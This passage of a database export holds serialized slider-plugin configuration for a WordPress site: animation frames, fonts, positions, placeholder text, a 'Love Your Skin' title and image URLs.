From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"12\":{\"text\":\"Dicam disputando est no, idque patrioque gubergren id cum, mei posse elitr argumentum et. Nam impetus eleifend vituperatoribus ad, idque menandri in his justo primis.\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":12,\"size\":{\"width\":{\"d\":{\"v\":\"575px\",\"e\":true},\"n\":{\"v\":\"526px\",\"e\":true},\"t\":{\"v\":\"539px\",\"e\":true},\"m\":{\"v\":\"539px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"69px\",\"e\":true},\"t\":{\"v\":\"69px\",\"e\":true},\"m\":{\"v\":\"69px\",\"e\":true}},\"originalWidth\":\"575px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-333px\",\"e\":true},\"n\":{\"v\":\"-235px\",\"e\":true},\"t\":{\"v\":\"-26px\",\"e\":true},\"m\":{\"v\":\"-26px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"45px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"178px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":620},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#767676\",\"e\":true},\"n\":{\"v\":\"#767676\",\"e\":true},\"t\":{\"v\":\"#767676\",\"e\":true},\"m\":{\"v\":\"#767676\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#767676\",\"e\":true},\"n\":{\"v\":\"#767676\",\"e\":true},\"t\":{\"v\":\"#767676\",\"e\":true},\"m\":{\"v\":\"#767676\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"13\":{\"text\":\"Love Your Skin\",\"alias\":\"Title\",\"uid\":13,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"397px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-343px\",\"e\":true},\"n\":{\"v\":\"-220px\",\"e\":true},\"t\":{\"v\":\"-36px\",\"e\":true},\"m\":{\"v\":\"-3px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-86px\",\"e\":true},\"n\":{\"v\":\"-45px\",\"e\":true},\"t\":{\"v\":\"137px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":550},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1650,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"45px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"14\":{\"text\":\"Image 14\",\"alias\":\"Cvetic\",\"uid\":14,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic3.png\",\"imageId\":3238},\"size\":{\"width\":{\"d\":{\"v\":\"120px\",\"e\":true},\"n\":{\"v\":\"88px\",\"e\":true},\"t\":{\"v\":\"86px\",\"e\":true},\"m\":{\"v\":\"86px\"}},\"height\":{\"d\":{\"v\":\"108px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"77px\",\"e\":true},\"m\":{\"v\":\"77px\"}},\"originalWidth\":120,\"originalHeight\":108,\"aspectRatio\":{\"d\":{\"v\":1.1111111111111112},\"n\":{\"v\":1.1111111111111112},\"t\":{\"v\":1.1111111111111112},\"m\":{\"v\":1.1111111111111112}}},\"position\":{\"x\":{\"d\":{\"v\":\"-557px\",\"e\":true},\"n\":{\"v\":\"-452px\",\"e\":true},\"t\":{\"v\":\"-252px\",\"e\":true},\"m\":{\"v\":\"-252px\"}},\"y\":{\"d\":{\"v\":\"-189px\",\"e\":true},\"n\":{\"v\":\"-127px\",\"e\":true},\"t\":{\"v\":\"31px\",\"e\":true},\"m\":{\"v\":\"31px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":480},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(11,5,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#f5f5f5\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Slova\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic7-1.png\",\"imageId\":3310},\"size\":{\"width\":{\"d\":{\"v\":\"1637px\",\"e\":true},\"n\":{\"v\":\"1376px\",\"e\":true},\"t\":{\"v\":\"1376px\"},\"m\":{\"v\":\"1376px\"}},\"height\":{\"d\":{\"v\":\"1066px\",\"e\":true},\"n\":{\"v\":\"896px\",\"e\":true},\"t\":{\"v\":\"896px\"},\"m\":{\"v\":\"896px\"}},\"originalWidth\":1637,\"originalHeight\":1066,\"aspectRatio\":{\"d\":{\"v\":1.5356472795497185},\"n\":{\"v\":1.5356472795497185},\"t\":{\"v\":1.5356472795497185},\"m\":{\"v\":1.5356472795497185}}},\"position\":{\"x\":{\"d\":{\"v\":\"-20px\",\"e\":true},\"n\":{\"v\":\"-3px\",\"e\":true},\"t\":{\"v\":\"-3px\"},\"m\":{\"v\":\"-3px\"}},\"y\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"2px\",\"e\":true},\"t\":{\"v\":\"2px\"},\"m\":{\"v\":\"2px\"}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 